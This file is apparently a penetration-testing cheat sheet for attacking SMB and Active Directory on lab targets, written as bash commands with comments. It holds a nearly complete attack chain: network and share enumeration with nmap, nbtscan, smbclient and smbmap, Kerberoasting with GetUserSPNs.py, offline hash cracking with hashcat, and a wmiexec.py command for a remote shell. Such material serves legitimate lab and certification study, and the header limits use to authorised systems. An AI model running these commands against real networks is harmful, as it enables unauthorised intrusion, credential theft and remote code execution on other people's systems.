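#!/usr/bin/env bash
# SMB / Active Directory enumeration cheat sheet (lab targets 192.168.50.0/24 and 10.10.10.100).
# These are standalone commands meant to be copied one at a time, not run as a script:
# executing this file end-to-end would launch every scan below. Only run them against
# systems you are authorized to test.

# 1. Find hosts with SMB open (TCP 139/445); -oG writes a greppable summary to smb.txt.
#    (-p is required here: without it nmap treats "139,445" as a target hostname.)
nmap -v -p 139,445 -oG smb.txt 192.168.50.1-254

# 2. Enumerate with nmap NSE: list the available smb-* scripts, then fingerprint OS/domain.
ls /usr/share/nmap/scripts/smb*
nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152

# 3. Query NetBIOS names on the subnet (CIDR only, no trailing slash).
sudo nbtscan -r 192.168.50.0/24

# 4. List shares. smbclient takes the server as //host and the user with -U (uppercase);
#    it prompts for the password instead of taking it on the command line.
smbclient -L //192.168.50.152 -U user
# Null-session attempt (-N = no password); fails cleanly if the server rejects it.
smbclient -L //192.168.50.152 -N

# 5. Same thing from a Windows host. This is cmd.exe syntax, not bash (bash would
#    collapse \\dc01 to \dc01), so it is kept as a note:
#    net view \\dc01 /all

# 6. Walk the shares with domain credentials to find readable files (e.g. the flag).
#    NOTE: -p places the password in argv, so it ends up in shell history and `ps` output.
smbmap -d active.htb -u SVC_TGS -p password -H 10.10.10.100

# 7. Kerberoast: list SPN-bearing accounts and request their TGS tickets (-request),
#    writing the hashes in hashcat format to file.txt. Use straight quotes around the
#    target string; typographic quotes are passed literally and break the credential.
python GetUserSPNs.py -request -outputfile file.txt -dc-ip 10.10.10.100 'active.htb/SVC_TGS:password'

# 8. Then crack the TGS-REP hashes offline (mode 13100 = Kerberos 5 TGS-REP etype 23 / RC4):
#    hashcat -m 13100 file.txt /usr/share/wordlists/rockyou.txt

# 9. With recovered credentials that hold local admin on the target, get a shell:
#    wmiexec.py 'active.htb/user:pass@10.10.10.100'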